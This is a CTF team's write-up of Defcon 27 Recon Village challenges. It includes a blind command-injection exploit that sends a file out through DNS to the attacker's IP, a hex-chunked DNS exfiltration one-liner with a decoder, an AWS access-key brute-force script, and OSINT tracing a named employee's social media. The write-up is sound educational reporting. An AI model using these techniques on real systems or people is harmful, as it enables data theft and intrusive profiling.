
Recon Village CTF @ Defcon 27

My CTF team, Neutrino Cannon, participated in the Recon Village CTF at Defcon 27 for the third year in a row, and as the saying goes, "the third time is the charm": we finished in first place. We dedicated almost all of our time at Defcon to the CTF, and the team's unwavering focus on completing challenges locked in the victory.


There were many more challenges this year than in past years, and while this write-up covers most of them, it is not exhaustive. The official write-up from the Recon Village team should be released in the coming days, so be sure to check that out as well.

Challenge Solutions


USA - 500 points


Opening the provided URL into a browser, the site greets us with a simple input field.


The page source revealed that the flag would be located at "/opt/flag.txt", so we knew there had to be some way to read it, whether through LFI or an injection of some sort.

We started with simple manual tests. XSS worked, but it didn't look like it would yield anything useful. Noticing that the page was PHP, we moved on to PHP code injection to see if anything would execute. That did not pan out either, so we kept fuzzing the field with a Burp Collaborator server up, and noticed that the Collaborator was receiving hits from payloads containing plain OS command injection.


Seeing that the server was reaching the Collaborator confirmed a blind OS command injection: nothing the command prints comes back in the HTTP response, so the output has to leave the box some other way. We could not get a reverse shell, but we retrieved the flag through DNS exfiltration using nslookup.

First we started a tcpdump on our own host to watch for DNS queries:
"tcpdump -ni eth0 udp port 53"

Then we injected the following command, pointing nslookup directly at our IP so the query is sent to our host rather than through the target's resolver:
"nslookup $(cat /opt/flag.txt) <IP address>"

When the target sends the query, the flag shows up as the queried hostname in the capture. Two caveats with this quick form: `$(cat ...)` is subject to shell word splitting, so a flag containing whitespace would be split across nslookup's arguments, and a single DNS label is limited to 63 characters, so a longer or punctuation-heavy value has to be chunked and encoded first.
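The encode-on-target, decode-from-capture version of that exfiltration, as an added example that is not part of the original write-up. The secret, the domain `exfil.example`, the resolver address and the tcpdump line format are constructed for the example; the one-liner assumes xxd, fold and nslookup exist on the target, which the page does not state. Hex keeps every byte inside the hostname alphabet, sequence numbers survive out-of-order delivery and retries, and the decoder refuses to silently assemble a value with a gap in it:

```python
import re

# Constructed sample secret; the real /opt/flag.txt contents are not on the page.
SAMPLE_SECRET = b"flag{constructed example: spaces & symbols survive hex}"

CHUNK_HEX = 40  # hex digits per label; RFC 1035 caps a label at 63 bytes


def encode_chunks(data: bytes, domain: str, chunk_hex: int = CHUNK_HEX) -> list:
    """Hex-encode data and split it into query names <seq>.<hexchunk>.<domain>.

    Hex keeps every byte inside the hostname alphabet, so spaces and punctuation
    in the secret cannot break the query the way `nslookup $(cat file)` can.
    """
    if not 1 <= chunk_hex <= 63:
        raise ValueError("a DNS label holds at most 63 bytes")
    hexed = data.hex()
    pieces = [hexed[i:i + chunk_hex] for i in range(0, len(hexed), chunk_hex)]
    return [f"{seq}.{piece}.{domain}" for seq, piece in enumerate(pieces)]


def shell_oneliner(path: str, domain: str, resolver: str, chunk_hex: int = CHUNK_HEX) -> str:
    """The same encoding done on the target with coreutils, usable as the injected
    command. Assumes xxd, fold and nslookup are present there (an assumption)."""
    return (f"i=0; for c in $(xxd -p {path} | tr -d '\\n' | fold -w {chunk_hex}); "
            f"do nslookup $i.$c.{domain} {resolver}; i=$((i+1)); done")


def tcpdump_line(name: str) -> str:
    """Constructed line in the format `tcpdump -n udp port 53` prints for an A query."""
    return f"12:00:00.000001 IP 10.0.0.5.51234 > 10.0.0.1.53: 4242+ A? {name}. (60)"


def decode_queries(lines, domain: str) -> bytes:
    """Reassemble the secret from captured query names. Duplicates (retries) and
    out-of-order arrival are tolerated; a gap in the sequence is an error."""
    pat = re.compile(r"(?<![\w.])(\d+)\.([0-9a-f]+)\." + re.escape(domain), re.IGNORECASE)
    chunks = {}
    for line in lines:
        m = pat.search(line)
        if m:
            chunks[int(m.group(1))] = m.group(2).lower()  # resolvers may randomize case
    if not chunks:
        return b""
    expected = range(max(chunks) + 1)
    missing = [i for i in expected if i not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return bytes.fromhex("".join(chunks[i] for i in expected))


if __name__ == "__main__":
    print(shell_oneliner("/opt/flag.txt", "exfil.example", "198.51.100.7"))
    captured = [tcpdump_line(n) for n in reversed(encode_chunks(SAMPLE_SECRET, "exfil.example"))]
    print(decode_queries(captured, "exfil.example"))
```

Querying your own IP directly, as the write-up does, means the query lands on your tcpdump without any registered domain or delegated zone; with a real domain you would watch the authoritative server instead, which also survives the target only being able to reach its internal resolver.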


Turkey - 300 points


A quick Nmap scan of the IP shows port 8080 open and running Jira.


Based on the version shown in the page footer, there is an RCE CVE for it: CVE-2019-11581, a server-side template injection in Jira Server and Data Center. Per Atlassian's advisory, it is exploitable when an SMTP server is configured and either the Contact Administrators form is enabled or the attacker has Jira administrator access.

References:
-https://medium.com/@ruvlol/rce-in-jira-cve-2019-11581-901b845f0f
-https://community.atlassian.com/t5/Jira-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241

Using this with a reverse shell payload, we were able to access the server and retrieve the flag.


(*A screencap was not taken when capturing the flag from this RCE, and unfortunately, though not confirmed, we believe something went wrong with the server after a while, as RCE through this method no longer worked for my team or for other teams we spoke with post-CTF.)

Mongolia - 300 points


Based on the challenge text and the website, our spidey-sense was tingling that we either needed to send hash collision strings or there would be a type juggling vulnerability.


Interestingly, the strings we sent were not being processed by a plain MD5 function: the values echoed to the screen did not match the MD5 sums we computed locally. It could have been salting or multiple rounds of hashing, so rather than chase collisions against an unknown function we turned to type juggling.


Changing the GET request so that both parameters are arrays instead of strings (for example a[]=1&b[]=2) passes the check that the two inputs differ, while md5() called on an array returns NULL with a warning on PHP 5 and 7, so both "hashes" compare equal with == and the check is bypassed. The fix on the server side is to reject non-string input (is_string()) and compare hashes with === or hash_equals().


United Kingdom - 300 points


Looking at the fragment of the key in the challenge text, we realized this was an AWS challenge from the "AKIA" prefix. Two parts are needed to query AWS: the access key ID (the value with the missing characters) and the secret access key (which they graciously gave us). Since we had the secret and the access key ID was only missing its last two characters, we wrote a Python script that drives a bash script to test all 36^2 = 1,296 combinations, each making one simple API call. A valid key ID is the one for which AWS does not answer InvalidClientTokenId.

Bash script to query:
https://gist.github.com/cauealvesbraz/1121c0a0375648db13b137b31ef8955d

Python wrapper script:

#!/usr/bin/env python3
# Brute-force the two missing trailing characters of an AWS access key ID.
# The secret access key is known; each candidate is written to the default
# profile and ./key.sh (the gist linked above) makes a single API call with it.
import itertools
import os
import string
import subprocess

key_id = "AKIA2SR3ZZCIQ7LT5Q"  # two trailing characters missing
a_key = "wotwpfUVRMmhkRoGPfgxd69enU6e0lnLqwnvZjtg"
cred_path = os.path.expanduser("~/.aws/credentials")  # the original wrote /root/.aws/credentials

letters_and_digits = string.ascii_uppercase + string.digits  # 36 * 36 = 1296 candidates

for pair in itertools.product(letters_and_digits, repeat=2):
    new_key_id = key_id + "".join(pair)
    with open(cred_path, "w") as f:
        f.write("[default]\n"
                f"aws_access_key_id = {new_key_id}\n"
                f"aws_secret_access_key = {a_key}\n"
                "region = us-east-1\n")
    # key.sh makes one API call with the default profile; combine stdout and stderr
    # the way commands.getstatusoutput did, since the CLI prints errors to stderr.
    result = subprocess.run(["./key.sh", new_key_id], capture_output=True, text=True)
    text = result.stdout + result.stderr
    if "InvalidClientTokenId" in text:  # AWS: this key ID does not exist
        print(f"NOT FOUND: {new_key_id}\n [!]RESULT: {text}\n")
    else:  # any other answer (success or AccessDenied) means the key ID is real
        print(f"******FOUND******\n{new_key_id}\n [+]RESULT: {text}\n")
        with open("key.txt", "w") as k_f:
            k_f.write(new_key_id)
        break

This resulted in the following access key ID: AKIA2SR3ZZCIQ7LT5QVZ

With the valid access key ID and secret access key, we could list the S3 buckets present and retrieve the flag.


Canada - 400 points


The challenge text reeked of Docker, and a 'docker pull' of the likely repository name successfully grabbed an image.


Exploring the image history (docker history), we found a curl command that fetched a Node.js-related file at build time. Curling that file ourselves, we saw a git repository mentioned in its source.



Browsing to the repository, we combed through the commit history and found the flag.
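The same triage done against the image's own metadata rather than by eyeballing `docker history`, as an added example that is not part of the original write-up. A `docker save` tarball carries a manifest.json and one config JSON per image whose `history` list is the build steps `docker history` prints (the config lists them oldest first; the CLI shows newest first). The config below is constructed, and its URL and token value are placeholders; the challenge image itself is not on the page:

```python
import io
import json
import os
import re
import tarfile
import tempfile

# Constructed image config in the shape `docker save` stores it (<digest>.json).
# Not the challenge image; the URL and the token value are placeholders.
SAMPLE_CONFIG = {
    "architecture": "amd64",
    "config": {"Cmd": ["node", "/app/server.js"]},
    "history": [
        {"created": "2019-07-01T00:00:00Z",
         "created_by": "/bin/sh -c #(nop) ADD file:0123 in / "},
        {"created": "2019-07-01T00:00:01Z",
         "created_by": "/bin/sh -c #(nop)  ENV API_TOKEN=placeholder-token", "empty_layer": True},
        {"created": "2019-07-01T00:00:02Z",
         "created_by": "/bin/sh -c curl -sSL https://example.invalid/app/server.js -o /app/server.js"},
        {"created": "2019-07-01T00:00:03Z",
         "created_by": "/bin/sh -c #(nop)  CMD [\"node\" \"/app/server.js\"]", "empty_layer": True},
    ],
}

URL_RE = re.compile(r"https?://[^\s'\"]+")
SECRET_RE = re.compile(r"\b\w*(?:TOKEN|SECRET|PASSWORD|KEY)\w*=", re.IGNORECASE)


def history_commands(config: dict) -> list:
    """Every build step recorded in the image config, oldest first."""
    return [h.get("created_by", "") for h in config.get("history", [])]


def fetch_commands(commands) -> list:
    """Steps that pulled something from the network at build time."""
    return [c for c in commands if re.search(r"\b(?:curl|wget)\b", c)]


def urls_in(commands) -> list:
    """URLs mentioned in build steps: what to fetch next during recon."""
    return [u for c in commands for u in URL_RE.findall(c)]


def leaked_env(commands) -> list:
    """ENV/ARG steps whose variable name looks like a credential; these persist in the image."""
    return [c for c in commands if SECRET_RE.search(c)]


def load_configs(saved_tar_path: str) -> list:
    """Read each image config named in manifest.json of a `docker save` tarball."""
    with tarfile.open(saved_tar_path) as tar:
        manifest = json.load(tar.extractfile("manifest.json"))
        return [json.load(tar.extractfile(entry["Config"])) for entry in manifest]


def build_sample_tar() -> str:
    """Write a minimal tarball in `docker save` layout holding SAMPLE_CONFIG; returns its path."""
    config_bytes = json.dumps(SAMPLE_CONFIG).encode()
    config_name = "0" * 64 + ".json"  # docker names this file by its digest
    manifest_bytes = json.dumps(
        [{"Config": config_name, "RepoTags": ["sample:latest"], "Layers": []}]).encode()
    fd, path = tempfile.mkstemp(suffix=".tar")
    os.close(fd)
    with tarfile.open(path, "w") as tar:
        for name, payload in ((config_name, config_bytes), ("manifest.json", manifest_bytes)):
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return path


if __name__ == "__main__":
    for cfg in load_configs(build_sample_tar()):
        cmds = history_commands(cfg)
        print("fetched at build time:", urls_in(fetch_commands(cmds)))
        print("credential-looking ENV:", leaked_env(cmds))
```

Against a real image, run `docker save <image> -o img.tar` and pass that path to `load_configs`; the layer tarballs listed under `Layers` are worth extracting too, since files deleted in a later layer are still present in the earlier one.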


Belarus - 200 points


Image:

Looking closely at the image, there is faint text on the white building's wall. Zooming in on it reveals "English National Ballet".

 https://www.google.nl/maps/place/English+National+Ballet/@51.5120302,0.0062593,17z/data=!4m5!3m4!1s0x4876055b0af21cdb:0x435e69d83228ec35!8m2!3d51.5132496!4d0.0064038

The above map shows that the nearest train station is "Canning Town", which is the flag.


Ethiopia - 100 points


Using ZoomEye, we crafted a search query to locate the indicated host, and thus the flag:

+country:"MX" +app:"WebLogic applications server" +after:"2015-01-01" +before:"2016-01-01"


Australia - 200 points



This challenge required you to be on-site at Defcon. The back of the regular Recon Village badge handed out to attendees had a string of binary.


Converting the binary to ASCII gave only "https://pa". Having noticed that staff wore a red badge while we had a black one, we knew we had to track one of them down for the next part of the puzzle.

A red badge gave us more of the URL:

"https://pastebin.com"

We then realized that speakers at the village had yet another badge color, and after waiting for a speaker to be free after a talk, we got the final part of the URL and retrieved the flag.


"https://pastebin.com/CQ5Bg9X7"

flag:{y0uar3g00datnetw0rking}

South Africa - 300 points


Image:

Based on the text on the building, "Shakespeare's Head", we located it on the map:
https://www.google.com/maps/place/Shakespeare%27s+Head/@51.516816,-0.1218747,17z/data=!3m1!4b1!4m5!3m4!1s0x48761b350efbd81b:0x5db525154ac44772!8m2!3d51.516816!4d-0.119686

Changing the address to "70", we determined that the company was 'Mishcon de Reya'.

A bit of searching found that the "mishcon.com/people" page listed employee profiles, and that Lena Kearney was the Strategy Manager.

Searching for her on Facebook, the listed current employer matched, and exploring her profile revealed the name of the catering company, "Sinclair's Catering", which was the flag.

Norway - 300 points


With some Google-fu, we suspected the student was Ben Price:
http://www.diggah.net/contact-2/

Doing a bit more... digging... we found his email to be "diggah@diggah.net". Searching on this email turned up a Pastebin dump with credentials, which was the flag.

https://pastebin.com/YKMtMT6J
flag:{diggah@diggah.net:m0nkeyfun} 

Thailand - 100 points


Image:

A pretty basic steganography challenge. Exiftool reveals a steghide password in the image metadata:


Using steghide with that password, we extracted the 'secrets.txt' file containing the flag.
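Exiftool's "Comment" tag is the JPEG COM segment. As an added example that is not part of the original write-up, here is a small parser that walks the JPEG marker segments and pulls that comment out with no tools, run against a constructed minimal JPEG (the challenge image is not on the page). It assumes the hint sat in a COM segment; if it lived in EXIF tags instead, this parser only reports that an APP1 segment is present:

```python
import struct

# Markers that carry no length field: TEM, RSTn, SOI, EOI
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each header segment up to and including Start Of Scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte between segments, skip it
            pos += 1
            continue
        pos += 2
        if marker in STANDALONE:
            if marker == 0xD9:  # EOI
                return
            continue
        (length,) = struct.unpack(">H", data[pos:pos + 2])  # length includes its own 2 bytes
        yield marker, data[pos + 2:pos + length]
        if marker == 0xDA:  # SOS: entropy-coded image data follows, no more headers
            return
        pos += length


def comments(data: bytes) -> list:
    """Text of every COM segment, which exiftool reports as 'Comment'."""
    return [p.decode("utf-8", "replace") for m, p in jpeg_segments(data) if m == 0xFE]


def app_segments(data: bytes) -> list:
    """Names of APPn segments present (APP1 is where EXIF lives)."""
    return [f"APP{m - 0xE0}" for m, _ in jpeg_segments(data) if 0xE0 <= m <= 0xEF]


def build_sample_jpeg(comment: str) -> bytes:
    """Constructed minimal file: SOI, APP0 JFIF, COM, SOS header, dummy scan bytes, EOI."""
    def seg(marker: int, payload: bytes) -> bytes:
        return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return (b"\xff\xd8" + seg(0xE0, jfif) + seg(0xFE, comment.encode())
            + seg(0xDA, b"\x01\x01\x00\x00\x3f\x00") + b"\x00\x11\x22" + b"\xff\xd9")


if __name__ == "__main__":
    img = build_sample_jpeg("steghide password: constructed-example")
    print(app_segments(img), comments(img))
```

Point `comments()` at the bytes of a real file to see what exiftool shows as Comment; a file can carry several COM segments, and all of them are returned.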


Romania - 200 points


We are given a zip containing a public.pem and an encrypted secrets.zip. Using the well-known RsaCtfTool (https://github.com/Ganapati/RsaCtfTool) we recovered the private key from the weak public key, and then decrypted the file with 'openssl rsautl'.
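RsaCtfTool runs a battery of attacks against a public key, and the write-up does not say which one succeeded here. As an added example that is not the team's code or RsaCtfTool's, this is one of those attacks, Fermat factorization, which recovers p and q when they are close together, followed by the private exponent. The key is constructed at runtime from adjacent 41-bit primes so the weakness is guaranteed; the real public.pem is not on the page:

```python
import math

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed bases; deterministic for n < 3.3e24, which covers the sample."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def next_prime(n: int) -> int:
    n += 1
    while not is_probable_prime(n):
        n += 1
    return n


def fermat_factor(n: int, max_steps: int = 1_000_000):
    """Fermat's method: find a, b with n = a^2 - b^2 = (a-b)(a+b).

    Starting from ceil(sqrt(n)), each step costs one integer square root, and the
    number of steps grows with (q-p)^2 / sqrt(n): fast for close primes, hopeless
    for properly generated ones. Returns (p, q) or None when max_steps is exhausted.
    """
    if n % 2 == 0:
        return 2, n // 2
    a = math.isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None


def private_exponent(e: int, p: int, q: int) -> int:
    """d = e^-1 mod (p-1)(q-1); the modular inverse via pow needs Python 3.8+."""
    return pow(e, -1, (p - 1) * (q - 1))


def sample_weak_key():
    """Constructed key whose primes are adjacent, the failure mode Fermat exploits."""
    p = next_prime(1 << 40)
    q = next_prime(p)
    e = 65537
    while math.gcd(e, (p - 1) * (q - 1)) != 1:
        q = next_prime(q)
    return p, q, e


if __name__ == "__main__":
    p, q, e = sample_weak_key()
    n = p * q
    factors = fermat_factor(n)
    d = private_exponent(e, *factors)
    m = 0xC0FFEE
    print("recovered primes:", factors, "round trip ok:", pow(pow(m, e, n), d, n) == m)
```

Once p and q are known, the remaining work is packaging n, e, d, p, q as a PEM private key (RsaCtfTool does this for you) so that `openssl rsautl -decrypt -inkey private.pem` can consume it, as the team did. Properly generated keys pick p and q independently, which keeps their gap around 2^(bits/2) and puts Fermat's method far out of reach.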




Results


Feedback and Comments

The organizers did a great job as always putting on this CTF, and we had a lot of fun participating again this year. You could feel their passion and devotion to creating something exciting and challenging in the boost in both challenge difficulty and volume. There are only a couple of tweaks we would recommend for future CTFs. First, a couple of the challenges were overly vague in their descriptions. Vagueness is understandable in a challenge, but in certain instances a bit more direction as to what we were searching for would have been appreciated (looking at you, Spain!); this may be elucidated in the official write-up. And lastly, a bit more communication from the organizers: there were a couple of hiccups at the start where challenges were missing their attachments and teams were hunting for something completely off, and a broadcast on the gameboard or a tweet would have been appreciated. Overall it was super fun and we are looking forward to seeing what's in store next year! Thank you again!







